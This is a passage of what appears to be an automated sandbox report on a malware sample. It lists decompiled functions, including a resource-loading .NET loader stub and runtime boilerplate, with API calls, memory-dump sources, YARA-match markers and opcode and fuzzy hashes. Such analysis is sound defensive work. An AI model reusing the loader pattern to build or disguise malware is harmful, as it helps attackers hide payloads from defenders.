                0x004014d8
                0x004014e6
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v2.0.50727
                • API String ID: 2372384083-2350909873
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026623A0, Relevance: .5, Instructions: 505COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a0958f3afc12695942f7775fa44a1e34a933d108b1ddf2c294812d2cc1707892
                • Instruction ID: 9b633a736d3f5643c33af8535435427c7ac433b5f2a3e751413f668d8112bdf5
                • Opcode Fuzzy Hash: a0958f3afc12695942f7775fa44a1e34a933d108b1ddf2c294812d2cc1707892
                • Instruction Fuzzy Hash: 9612AD30A00215CFDB28DF29C9A86BDBBF2FF84304F15812AD816EB355DB75994ADB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02662FA8, Relevance: .2, Instructions: 239COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f07b5f0553648cc435bd5f3d30e28a89268d24516036c27051302db37625b2b9
                • Instruction ID: 01b6b653799244742177604c1ed39f632477569741cc796e547cc64452e61320
                • Opcode Fuzzy Hash: f07b5f0553648cc435bd5f3d30e28a89268d24516036c27051302db37625b2b9
                • Instruction Fuzzy Hash: 19818F31F011569BD714DB69D988A6EB7E3AFC4710F2A80B5E405EB36ADE31DC06C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026602E8, Relevance: 6.5, Strings: 5, Instructions: 213COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID: TeY$TeY$TeY$TeY$TeY
                • API String ID: 0-3072034030
                • Opcode ID: d6101d20697842c8c072418d3cc1c226e51e23ee58d10a63164ac73fa9ed0327
                • Instruction ID: 9acaf8fa61315c226d39e6cf5cf0c3e8452eefe0d96d942a84ea14a200dcb53b
                • Opcode Fuzzy Hash: d6101d20697842c8c072418d3cc1c226e51e23ee58d10a63164ac73fa9ed0327
                • Instruction Fuzzy Hash: 3871A030B042058FCB08DB69D46877E7BF2BFC9310F18847AD506AB3A5DA319C46DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026602D9, Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID: TeY$TeY$TeY$TeY
                • API String ID: 0-3866915519
                • Opcode ID: 86c3ec6a4000b39272759d94cfe72b7a5c240ac1ed89af11714a42713bdf70f8
                • Instruction ID: 08d63e66788f80eeec7fad9529945cf4897a2738b4b47695a102c921b8e236a9
                • Opcode Fuzzy Hash: 86c3ec6a4000b39272759d94cfe72b7a5c240ac1ed89af11714a42713bdf70f8
                • Instruction Fuzzy Hash: D9415930A05206CFDB18CF69D058BBE7BB2BF89311F18847AD506AB7A0DB719C46CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                0x004055c5
                0x004055cf
                0x004055d3
                0x004055e4
                0x004055e8
                0x004055ed
                0x004055f3
                0x004055f8
                0x004055fd
                0x00405602
                0x00405609
                0x004055d5
                0x004055d5
                0x004055d5
                0x00405614

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02660006, Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID: 4kY$XgY
                • API String ID: 0-3817103181
                • Opcode ID: 194b9b6416b21364f137e9d1436281a90b522df8a1d4a3f8e75bf3ea1760a859
                • Instruction ID: 572e23d7d5b14277d076fb936d95dbbb8a10fc74a8601bb5f0ef9fb63c18b3ad
                • Opcode Fuzzy Hash: 194b9b6416b21364f137e9d1436281a90b522df8a1d4a3f8e75bf3ea1760a859
                • Instruction Fuzzy Hash: 0031D73050E3C1CFCB06ABB498695697FB1EE46304B1A44DBE4C5CB2A7D625980ADB53
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026621F8, Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID: hoY$r*+
                • API String ID: 0-3720658534
                • Opcode ID: 7e0b4d816fc1d10c63e4e07348004a39ce293fc2042d20fc57ac764ad01f48f3
                • Instruction ID: 845a4ff1ee2a8fc7478083b10a7235c13724d8d77fdd98d8c340b37b734fbcd0
                • Opcode Fuzzy Hash: 7e0b4d816fc1d10c63e4e07348004a39ce293fc2042d20fc57ac764ad01f48f3
                • Instruction Fuzzy Hash: B941F734E08209DFDF48DBA5C5A96BEBBF5FF45304F10806AD802A72A0D7359A46DF52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B00416, Relevance: 1.6, APIs: 1, Instructions: 84synchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateMutexW.KERNELBASE(?,?), ref: 04B004B1
                Memory Dump Source
                • Source File: 0000000B.00000002.307122323.0000000004B00000.00000040.00000001.sdmp, Offset: 04B00000, based on PE: false
                Similarity
                • API ID: CreateMutex
                • String ID:
                • API String ID: 1964310414-0
                • Opcode ID: 48a9cf50b00b93104caa7bacd1129be1cfe6fe87e1f16aff5281dcf2dcf68dfc
                • Instruction ID: abdc88b8e570ae6f744c3c180a99c51436e29012d742a071df0fab1dd2b90897
                • Opcode Fuzzy Hash: 48a9cf50b00b93104caa7bacd1129be1cfe6fe87e1f16aff5281dcf2dcf68dfc
                • Instruction Fuzzy Hash: F43181715093806FE721DF25DC85F66FFE8EF05310F0884AEE9848B292D365E908CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B0043E, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateMutexW.KERNELBASE(?,?), ref: 04B004B1
                Memory Dump Source
                • Source File: 0000000B.00000002.307122323.0000000004B00000.00000040.00000001.sdmp, Offset: 04B00000, based on PE: false
                Similarity
                • API ID: CreateMutex
                • String ID:
                • API String ID: 1964310414-0
                • Opcode ID: 246be39709218dc96a3846fb0b7b07b2910b8bf8022a0951a157d62008999f37
                • Instruction ID: ef3a6923d1ff9390b05a3705959d0a22a926e4a4fc91bfc4eaa534a7cbb6b452
                • Opcode Fuzzy Hash: 246be39709218dc96a3846fb0b7b07b2910b8bf8022a0951a157d62008999f37
                • Instruction Fuzzy Hash: DA217171604240AFE720DF29DD85B66FBE8EF04720F14C4AAED458B282D675E504CA75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B00205, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                Download Yara Rule
                APIs
                • DispatchMessageW.USER32(?), ref: 04B00270
                Memory Dump Source
                • Source File: 0000000B.00000002.307122323.0000000004B00000.00000040.00000001.sdmp, Offset: 04B00000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: dd202e5a801eac7086f2cebd5d3a3b5e7a70c493b43d8ed6017388940f212988
                • Instruction ID: 43554a448ff35e3ab1565d1b9933eba62d8035a8382a56169deab626fa602a2f
                • Opcode Fuzzy Hash: dd202e5a801eac7086f2cebd5d3a3b5e7a70c493b43d8ed6017388940f212988
                • Instruction Fuzzy Hash: 3C117F7540D3C4AFDB128F159C44761BF74EF47624F0980DADD858F253D269A908CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B002B4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                Download Yara Rule
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 04B0030C
                Memory Dump Source
                • Source File: 0000000B.00000002.307122323.0000000004B00000.00000040.00000001.sdmp, Offset: 04B00000, based on PE: false
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: 8fb80ba63384578233bf0ddcffa1ff681c6c1969c3afb4391c598b81237b1ea8
                • Instruction ID: ac44969c8f642e74156227343ae751606de4ebdb820f713761330993ecff6c39
                • Opcode Fuzzy Hash: 8fb80ba63384578233bf0ddcffa1ff681c6c1969c3afb4391c598b81237b1ea8
                • Instruction Fuzzy Hash: 1C11A3715093809FD751CF25EC85B56BFA8EF46221F08C4EAED49CF252D275E848CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B002D2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 04B0030C
                Memory Dump Source
                • Source File: 0000000B.00000002.307122323.0000000004B00000.00000040.00000001.sdmp, Offset: 04B00000, based on PE: false
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: e1fa6923f6f4cb57111dfeda52b2e855832ca359c5a5504f5f99b18f96220559
                • Instruction ID: 591aa97fcc7a7abb1c527a6f7fddc3a01fde09829eb84c6c32d20a73afcd3570
                • Opcode Fuzzy Hash: e1fa6923f6f4cb57111dfeda52b2e855832ca359c5a5504f5f99b18f96220559
                • Instruction Fuzzy Hash: 3F017171A053409FDB61DF2AE885766FF94EF04621F08C4AADD49CF286E675E408CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B0023E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                Download Yara Rule
                APIs
                • DispatchMessageW.USER32(?), ref: 04B00270
                Memory Dump Source
                • Source File: 0000000B.00000002.307122323.0000000004B00000.00000040.00000001.sdmp, Offset: 04B00000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 96307875a46938656603fc2b3b5ca293acf690e9d3504e3f9bee768aa6cd72c7
                • Instruction ID: 306e1ba5bca1318f7e644ef6a9f26653e9d8be1c7642ae97d852627f81bf5330
                • Opcode Fuzzy Hash: 96307875a46938656603fc2b3b5ca293acf690e9d3504e3f9bee768aa6cd72c7
                • Instruction Fuzzy Hash: F7F0AF359083449FDF60DF05E885761FFA0EF04721F08C0EADD494B292D2B9E508CEA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                0x00403e3d
                0x00403e43
                0x00403e49
                0x00403e7b
                0x00403e80
                0x00403e86
                0x00000000
                0x00403e86
                0x00403e4d
                0x00403e4f
                0x00403e4f
                0x00403e66
                0x00403e6f
                0x00403e77
                0x00000000
                0x00000000
                0x00403e57
                0x00403e59
                0x00000000
                0x00000000
                0x00403e5c
                0x00403e61
                0x00403e62
                0x00403e64
                0x00000000
                0x00000000
                0x00403e64
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02662D58, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 7e6174bdd7caf0afbce660365543f397b3c66ba2a4d602efbe33d4218bf65fab
                • Instruction ID: ffe36384ada91b632b1889a3ffd66883535a2b3b9bc67f8f93725583d5522ba6
                • Opcode Fuzzy Hash: 7e6174bdd7caf0afbce660365543f397b3c66ba2a4d602efbe33d4218bf65fab
                • Instruction Fuzzy Hash: 7D41B170E082558BCB14CBA9C8985BEBBB2ABC1214F28857ACC15DB745D731E853C7D2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02660681, Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID: }Y
                • API String ID: 0-1328181529
                • Opcode ID: 9b6ef29e9f69e2e52b8e12b44c057452929826536e936c1a61ba3976ae1a1eed
                • Instruction ID: 8f193b8bbad8675ff2c9f3cd795bf26e3a780d938d475b1ef939046455a7e853
                • Opcode Fuzzy Hash: 9b6ef29e9f69e2e52b8e12b44c057452929826536e936c1a61ba3976ae1a1eed
                • Instruction Fuzzy Hash: D04129342282098FDB187B35ED1D56D3FA2BF99701B16856BF402C7275DF304C0AAB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026612A0, Relevance: .5, Instructions: 460COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43bcbeac3675aeb7747066ede32a81bd5b82303686358cfe10a98b8f6b1cd900
                • Instruction ID: 4de718591ee000a645cadaaceaebea8a9268792a90c014b659a1213b83f4c351
                • Opcode Fuzzy Hash: 43bcbeac3675aeb7747066ede32a81bd5b82303686358cfe10a98b8f6b1cd900
                • Instruction Fuzzy Hash: A522E434A00605CFCB64EF24C594A6ABBF2FF89300F14C59AE85A9B759DB34AD46CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02663B6B, Relevance: .4, Instructions: 421COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb02ef5ec0defe8d285c20c05b06868128b12eed0b6d86ec6700c1b3532ded47
                • Instruction ID: 4b0ac1f74138d2f7c8e19dff3a8629ba05dd76f91421b2c7b9cb963d972c0f1b
                • Opcode Fuzzy Hash: cb02ef5ec0defe8d285c20c05b06868128b12eed0b6d86ec6700c1b3532ded47
                • Instruction Fuzzy Hash: B8F17071A00205CFCB15CF68C9889A9FFB2FF85310B298596E9099F366D731ED56CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026609A5, Relevance: .1, Instructions: 135COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f0502063800fb44419c87e19eab97e1f5dc26918271886d7b4eff2758640a11d
                • Instruction ID: 1c9689d8d63f2aaecfb6f8b7975331fbe2e7c7556bc44d89de89281f00829d7c
                • Opcode Fuzzy Hash: f0502063800fb44419c87e19eab97e1f5dc26918271886d7b4eff2758640a11d
                • Instruction Fuzzy Hash: CA41B635B10205DFCB059BA5D858ABEBBF2FF84314F258466E5069B361DB31AC06DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02660BC0, Relevance: .1, Instructions: 132COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ba0bdde049ae7d5a258bc2bc615fd571bb276b3f367bd7e2b6e14a43e48c30a
                • Instruction ID: 2f9b4eae77011a89d42080d554963b4b7a9a01dcb303d9df06bd86c3b20e6475
                • Opcode Fuzzy Hash: 5ba0bdde049ae7d5a258bc2bc615fd571bb276b3f367bd7e2b6e14a43e48c30a
                • Instruction Fuzzy Hash: A8418531B04114DFC7199B68D4186BE7BE7BF85310F1581AAE906EF3A1CE729D0AC792
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02661458, Relevance: .1, Instructions: 128COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 34bff929610937718fd2eefccc9acb6a97c198fde9b806006b9bba0b07e99dfe
                • Instruction ID: f9d94cbcc4fa93bfcaee8abd5671de410e0ef8a3f555cf30fe65dd5db5f12207
                • Opcode Fuzzy Hash: 34bff929610937718fd2eefccc9acb6a97c198fde9b806006b9bba0b07e99dfe
                • Instruction Fuzzy Hash: 0E51E774A00259CFDB14EF64D898BADBBB2BF49300F5040DAE40AAB365CB359D85CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02661290, Relevance: .1, Instructions: 99COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bffc61a86af1f06600b88233419ec2bf460e8e0e7544f77d687715e2f8a2c5e9
                • Instruction ID: e725684a236eb17cf0671059302cd726891e2842a31a10f27be22695623531d8
                • Opcode Fuzzy Hash: bffc61a86af1f06600b88233419ec2bf460e8e0e7544f77d687715e2f8a2c5e9
                • Instruction Fuzzy Hash: 7641F874A04219DFCB18EF64D884BADBBB1BB4A300F0044EAE40EAB355DB309D85CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026620D0, Relevance: .1, Instructions: 98COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb124ab8b4e7c0ca85f5a2732791601ab94e881df7d4be7a88c917776007b0ef
                • Instruction ID: 3f731cb04b3fd8fc2185607f6f699d3271eade24b5d0e1fd8f16afa59b00b984
                • Opcode Fuzzy Hash: cb124ab8b4e7c0ca85f5a2732791601ab94e881df7d4be7a88c917776007b0ef
                • Instruction Fuzzy Hash: BB318630A0824ADFCB09DF68C8A567EBBB5FF84340F11846ADA46DB255D730AC47CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026625DE, Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ec9db7f4a77b019d01e6954919df338ef4b231080496d161a8d0d726d845d8c
                • Instruction ID: 7391af1b4e57a24a8a0b45f0acabaed889d8215bbf7e118b7802c1ce3c503534
                • Opcode Fuzzy Hash: 6ec9db7f4a77b019d01e6954919df338ef4b231080496d161a8d0d726d845d8c
                • Instruction Fuzzy Hash: A0319E74A00345CFDB20DF66D95876ABBF2FF85304F21C12AC805AB265DBB4998ADF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026621E9, Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0114416b25780da61c0ad71bb448748b29cf6a12dd1ac9798f8c3ad4f7d05036
                • Instruction ID: 207de12ff01c0329483a42a98981e557046539e771c4a94fb3d882e233359ec4
                • Opcode Fuzzy Hash: 0114416b25780da61c0ad71bb448748b29cf6a12dd1ac9798f8c3ad4f7d05036
                • Instruction Fuzzy Hash: BD314D70E0820ADFCB48DBA5C4A96BD7FF5FF45300F1040AAD802A7261D7359E46DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02664190, Relevance: .1, Instructions: 69COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 220b91b3f62588f1041ec5a1f79bf1dc0856c31c14666df15ae2eff9fa7f56a5
                • Instruction ID: eb40440d4a55ad62fd8f4cf273413beb239716c45f43b6d9a49053b88b6cb4de
                • Opcode Fuzzy Hash: 220b91b3f62588f1041ec5a1f79bf1dc0856c31c14666df15ae2eff9fa7f56a5
                • Instruction Fuzzy Hash: 2B110631B00206CBDB28A7B1D8485BF7BABAFD5300F21412F9807A7284DE715805D7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02664180, Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 900d1d37d95692cff5b3b3212f3709de736139ddf0d3774ea7a5ae87f9e0c7d1
                • Instruction ID: c21059693e76351441e844316c71d8b85286449c37ca043a2b2ee299328bbd2a
                • Opcode Fuzzy Hash: 900d1d37d95692cff5b3b3212f3709de736139ddf0d3774ea7a5ae87f9e0c7d1
                • Instruction Fuzzy Hash: 931106316182599FCF3997B0AC8C4FFBB6DEE96240F12056BD80293145DE725506C6A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026608AF, Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a1941a98250e7907aca36ce52c9cc700cf7ec7cf1568eaab9d8447231deade0f
                • Instruction ID: 35b556ae9e217a517c1d9a03f3406dd0baa94ab087214c8c7c36b5628c50bf4e
                • Opcode Fuzzy Hash: a1941a98250e7907aca36ce52c9cc700cf7ec7cf1568eaab9d8447231deade0f
                • Instruction Fuzzy Hash: 02114831B193589BDB185BB55848ABFBF6AABD5250F01437FD90697341CEA08C07C3D1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02660B18, Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4fca985534b1d5feb509c981e8e68f7ba644b6b43f9e9b830ff4904ef5f1703b
                • Instruction ID: 6e2de3b7b2fc106369ee95356019d8317b93544584217aaa77aea8550685ad53
                • Opcode Fuzzy Hash: 4fca985534b1d5feb509c981e8e68f7ba644b6b43f9e9b830ff4904ef5f1703b
                • Instruction Fuzzy Hash: 0911A130B58117EBCB2C5A74880D77E7A95BB8868CF20C47A9903EB244FA639D02C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026E820D, Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000B.00000002.306571716.00000000026E0000.00000040.00000040.sdmp, Offset: 026E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59c0029ec10bcf717f90909cf77739f05fcf91feafc4097a0f552a0755c6c9b7
                • Instruction ID: 141b1330233604322a52f7373ea5d81029c03644b6a2ced90c8c5869c64c84df
                • Opcode Fuzzy Hash: 59c0029ec10bcf717f90909cf77739f05fcf91feafc4097a0f552a0755c6c9b7
                • Instruction Fuzzy Hash: 86216D355097C08FDB03CB20D951751BFB1AF47218F1986DED4899B6A3C33A980ACB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026E8244, Relevance: .1, Instructions: 59COMMON
                Download Yara Rule
                Memory Dump Source
